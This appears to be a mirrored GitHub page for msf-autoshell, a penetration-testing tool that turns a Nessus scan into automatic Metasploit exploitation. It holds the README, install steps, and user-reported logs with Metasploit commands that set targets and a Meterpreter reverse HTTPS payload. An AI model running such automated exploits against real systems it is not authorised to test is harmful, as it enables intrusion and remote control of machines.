danmcinerney / msf-autoshell Goto Github PK

Feed the tool a .nessus file and it will automatically get you MSF shell

License: GNU General Public License v3.0

Python 100.00%

msf-autoshell's Introduction

msf-autoshell

Give it a .nessus file and it'll get you Metasploit shells. I've included the early and incomplete programs to make it easier for people who want to learn how to use the python-libnessus and msfrpc libraries.

msf-autoshell-boilerplate.py was the first step; a simple boilerplate program with some boring stuff filled out.
msf-autoshell-parse-nessus.py was the next step and all it does is parse the .nessus file and grab some info off the parsed objects.
msf-autoshell-msfrpc-connect.py shows how to connect to the Metasploit RPC server and some examples of interacting with it.
Finally, msf-autoshell.py is the final script with all the Metasploit logic code for running modules in it.

Installation

This install is only tested on Kali.

git clone https://github.com/DanMcInerney/msf-autoshell
cd msf-autoshell
pipenv install --three
pipenv shell

In a new terminal: 
> msfconsole
msf > load msgrpc Pass=123

Usage

python msf-autoshell.py -n /path/to/nessus/file.nessus

Credits

Thanks to Coalfire for some development time.

msf-autoshell's People

Stargazers

Watchers

Forkers

prosecurity qsdj dannymas ashr gavz zephrfish drookoo poeblu dgotrik w3llr00t3d projectboot raystyle lx277856602 killvxk dirkwilken secfb jrodriguez556 r0ug3 00derp ith4cker netredo bajaguy 02bx greyhatsbr b0rjitaaa beerandgin thebigplate heruix voukpaw sasqwatch attackgithub illbatting ncryptedwifkali toodee w1ck3dth1ngs slowmistio offshores ivanwork ntgitdude23 tuantadev southboy101 acknowledgehim masterscott deepantechnoids 5l1v3r1 ltgrp c0axial nusaibsqli mysteryz zuzumarshal waxes27 onnonn auto-hack-repos miltonlunavillagra mreetyunjaya meditology rakhithjk tai-rex tnexperts markus851 calvin951121 sayedmahmud philve mdrobinmolla1 nikenameyu

msf-autoshell's Issues

Exploit failed: The following options failed to validate: SESSION.

Hi,

msf-autoshell looks very interesting. Thank you for that!

However, I'm running into some problems that seems related to a session validation issue. I don't know if I missed something but here's the output of what I'm getting:

msf > python msf-autoshell.py -n /root/victim/nessus/victim_10_0_1_0.nessus
[*] exec: python msf-autoshell.py -n /root/victim/nessus/victim_10_0_1_0.nessus

[+] Found vulnerable host! 10.0.2.146:445 - MS15-078 Microsoft Windows Font Driver Buffer Overflow
[+] Found vulnerable host! 10.0.2.146:445 - MS15-078 Microsoft Windows Font Driver Buffer Overflow
[+] Found vulnerable host! 10.0.2.146:445 - Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability
[+] Found vulnerable host! 10.0.2.146:445 - Office OLE Multiple DLL Side Loading Vulnerabilities
[+] Found vulnerable host! 10.0.2.146:445 - Windows ClientCopyImage Win32k Exploit
[+] Found vulnerable host! 10.0.2.146:445 - Windows TrackPopupMenu Win32k NULL Pointer Dereference
[+] Found vulnerable host! 10.0.2.146:445 - Office OLE Multiple DLL Side Loading Vulnerabilities
[+] Found vulnerable host! 10.0.2.146:445 - LNK Code Execution Vulnerability
[+] Found vulnerable host! 10.0.2.146:445 - Windows Net-NTLMv2 Reflection DCOM/RPC
[+] Found vulnerable host! 10.0.2.146:445 - Office OLE Multiple DLL Side Loading Vulnerabilities
[+] Found vulnerable host! 10.0.2.146:445 - MS14-064 Microsoft Windows OLE Package Manager Code Execution
[+] Found vulnerable host! 10.0.2.146:445 - MS15-001 Microsoft Windows NtApphelpCacheControl Improper Authorization Check
[+] Found vulnerable host! 10.0.2.146:445 - Microsoft Windows Shell LNK Code Execution
[+] Found vulnerable host! 10.0.2.146:445 - Internet Explorer 11 VBScript Engine Memory Corruption
[+] Found vulnerable host! 10.0.2.146:445 - MS16-032 Secondary Logon Handle Privilege Escalation
[+] Found vulnerable host! 10.0.2.146:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.2.146:445 - MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
[+] Found vulnerable host! 10.0.2.146:445 - MS14-060 Microsoft Windows OLE Package Manager Code Execution
[+] Found vulnerable host! 10.0.2.143:445 - LNK Code Execution Vulnerability
[+] Found vulnerable host! 10.0.2.106:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.235:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.235:445 - Java Applet Reflection Type Confusion Remote Code Execution
[+] Found vulnerable host! 10.0.1.235:445 - Java storeImageArray() Invalid Array Indexing Vulnerability
[+] Found vulnerable host! 10.0.1.235:445 - Java Applet Method Handle Remote Code Execution
[+] Found vulnerable host! 10.0.1.235:445 - Java Applet JMX Remote Code Execution
[+] Found vulnerable host! 10.0.1.235:445 - Java Applet Field Bytecode Verifier Cache Remote Code Execution
[+] Found vulnerable host! 10.0.1.235:445 - Java CMM Remote Code Execution
[+] Found vulnerable host! 10.0.1.224:445 - Microsoft Office Word Malicious Hta Execution
[+] Found vulnerable host! 10.0.1.224:445 - LNK Code Execution Vulnerability
[+] Found vulnerable host! 10.0.1.224:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.224:445 - MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
[+] Found vulnerable host! 10.0.1.224:445 - Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability
[+] Found vulnerable host! 10.0.1.224:445 - Java Applet Reflection Type Confusion Remote Code Execution
[+] Found vulnerable host! 10.0.1.224:445 - Java storeImageArray() Invalid Array Indexing Vulnerability
[+] Found vulnerable host! 10.0.1.224:445 - Java AtomicReferenceArray Type Violation Vulnerability
[+] Found vulnerable host! 10.0.1.224:445 - Java Applet Method Handle Remote Code Execution
[+] Found vulnerable host! 10.0.1.224:445 - Java Applet JMX Remote Code Execution
[+] Found vulnerable host! 10.0.1.224:445 - Java Applet Field Bytecode Verifier Cache Remote Code Execution
[+] Found vulnerable host! 10.0.1.224:445 - Java CMM Remote Code Execution
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player casi32 Integer Overflow
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player ShaderJob Buffer Overflow
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player ByteArray Use After Free
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player Type Confusion Remote Code Execution
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player NetConnection Type Confusion
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player Drawing Fill Shader Memory Corruption
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player copyPixelsToByteArray Method Integer Overflow
[+] Found vulnerable host! 10.0.1.185:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.167:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.164:443 - PHP CGI Argument Injection
[+] Found vulnerable host! 10.0.1.164:80 - PHP CGI Argument Injection
[+] Found vulnerable host! 10.0.1.164:443 - PHP CGI Argument Injection
[+] Found vulnerable host! 10.0.1.164:80 - PHP CGI Argument Injection
[+] Found vulnerable host! 10.0.1.157:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.157:445 - Java Applet Reflection Type Confusion Remote Code Execution
[+] Found vulnerable host! 10.0.1.157:445 - Java Applet JMX Remote Code Execution
[+] Found vulnerable host! 10.0.1.157:445 - Java storeImageArray() Invalid Array Indexing Vulnerability
[+] Found vulnerable host! 10.0.1.157:445 - Java CMM Remote Code Execution
[+] Found vulnerable host! 10.0.1.157:445 - Java Applet Method Handle Remote Code Execution
[+] Found vulnerable host! 10.0.1.157:445 - Java Applet JMX Remote Code Execution
[+] Found vulnerable host! 10.0.1.157:445 - Java Applet Field Bytecode Verifier Cache Remote Code Execution
[+] Found vulnerable host! 10.0.1.157:445 - Java 7 Applet Remote Code Execution
[+] Found vulnerable host! 10.0.1.150:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.146:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.146:445 - Macrovision InstallShield Update Service ActiveX Unsafe Method
[+] Found vulnerable host! 10.0.1.126:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.126:445 - Java Applet Reflection Type Confusion Remote Code Execution
[+] Found vulnerable host! 10.0.1.126:445 - Java Applet JMX Remote Code Execution
[+] Found vulnerable host! 10.0.1.126:445 - Java storeImageArray() Invalid Array Indexing Vulnerability
[+] Found vulnerable host! 10.0.1.126:445 - Java CMM Remote Code Execution
[+] Found vulnerable host! 10.0.1.126:445 - Java Applet Method Handle Remote Code Execution
[+] Found vulnerable host! 10.0.1.126:445 - Java Applet JMX Remote Code Execution
[+] Found vulnerable host! 10.0.1.126:445 - Java 7 Applet Remote Code Execution
[+] Found vulnerable host! 10.0.1.124:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.120:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.111:445 - Office OLE Multiple DLL Side Loading Vulnerabilities
[+] Found vulnerable host! 10.0.1.111:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.111:445 - Internet Explorer 11 VBScript Engine Memory Corruption
[+] Found vulnerable host! 10.0.1.111:445 - Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability
[+] Found vulnerable host! 10.0.1.105:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.92:445 - Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability
[+] Found vulnerable host! 10.0.1.92:445 - LNK Code Execution Vulnerability
[+] Found vulnerable host! 10.0.1.92:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.92:445 - MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
[+] Found vulnerable host! 10.0.1.90:445 - Microsoft Office CVE-2017-11882
[+] Found vulnerable host! 10.0.1.90:445 - Office OLE Multiple DLL Side Loading Vulnerabilities
[+] Found vulnerable host! 10.0.1.90:445 - Microsoft Office Word Malicious Hta Execution
[+] Found vulnerable host! 10.0.1.86:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.79:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.79:2049 - NFS Mount Scanner
[+] Found vulnerable host! 10.0.1.72:2049 - NFS Mount Scanner
[+] Found vulnerable host! 10.0.1.71:2049 - NFS Mount Scanner
[+] Found vulnerable host! 10.0.1.58:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[] Collecting list of all Metasploit modules...
[] Running MSF command:
search exploit/

[*] Running MSF command:
use exploit/windows/local/ms15_078_atmfd_bof
show targets

[] Setting options on exploit/windows/local/ms15_078_atmfd_bof
[] Running MSF command:
set target 0
set RHOSTS 10.0.2.146
set RPORT 445
set LHOST 10.0.2.159
set SRVHOST 10.0.2.159
set payload windows/x64/meterpreter/reverse_https
set ExitOnSession True

[*] Running MSF command:
exploit -z

[] exploit/windows/local/ms15_078_atmfd_bof output:
[-] Exploit failed: The following options failed to validate: SESSION.
[] Exploit completed, but no session was created.

[*] Running MSF command:
use exploit/windows/local/ms15_078_atmfd_bof
show targets

[*] Running MSF command:
exploit -z

[] exploit/windows/local/ms15_078_atmfd_bof output:
[-] Exploit failed: The following options failed to validate: SESSION.
[] Exploit completed, but no session was created.

[*] Running MSF command:
use exploit/windows/local/mov_ss
show targets

[] Setting options on exploit/windows/local/mov_ss
[] Running MSF command:
set target 0
set RHOSTS 10.0.2.146
set RPORT 445
set LHOST 10.0.2.159
set SRVHOST 10.0.2.159
set payload windows/x64/meterpreter/reverse_https
set ExitOnSession True

[*] Running MSF command:
exploit -z

[*] exploit/windows/local/mov_ss output:
[-] Exploit failed: The following options failed to validate: SESSION.

[*] Running MSF command:
use exploit/windows/fileformat/office_ole_multiple_dll_hijack
show targets

Traceback (most recent call last):
File "msf-autoshell.py", line 463, in
main()
File "msf-autoshell.py", line 457, in main
run_nessus_exploits(client, console_id, nes_exploits)
File "msf-autoshell.py", line 162, in run_nessus_exploits
module_output = run_msf_module(client, c_id, local_ip, ip, path, port, os_type)
File "msf-autoshell.py", line 271, in run_msf_module
cmd = create_msf_cmd(mod_path, rhost_var, ip, port, payload, target_num)
UnboundLocalError: local variable 'rhost_var' referenced before assignment
msf > sessions

Active sessions

No active sessions.

msf > jobs

Jobs

No active jobs.

NameError: name 'check_for_args' is not defined

Hi,

I just Git cloned the latest commit on 2 different systems and I'm getting the following error on both systems:

msf > python msf-autoshell.py -n /root/victim/nessus/victim_10_0_1_0.nessus
[*] exec: python msf-autoshell.py -n /root/victim/nessus/victim_10_0_1_0.nessus

Traceback (most recent call last):
File "msf-autoshell.py", line 460, in
check_for_args()
NameError: name 'check_for_args' is not defined
msf >

Recommend Projects

React

A declarative, efficient, and flexible JavaScript library for building user interfaces.
Vue.js

🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript

TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
TensorFlow

An Open Source Machine Learning Framework for Everyone
Django

The Web framework for perfectionists with deadlines.
Laravel

A PHP framework for web artisans
D3

Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

javascript

JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
web

Some thing interesting about web. New door for the world.
server

A server is a program made to process requests and deliver data to clients.
Machine learning

Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Visualization

Some thing interesting about visualization, use data art
Game

Some thing interesting about game, make everyone happy.

Recommend Org

Facebook

We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft

Open source projects and samples from Microsoft.
Google

Google ❤️ Open Source for everyone.
Alibaba

Alibaba Open Source for everyone
D3

Data-Driven Documents codes.
Tencent

China tencent open source team.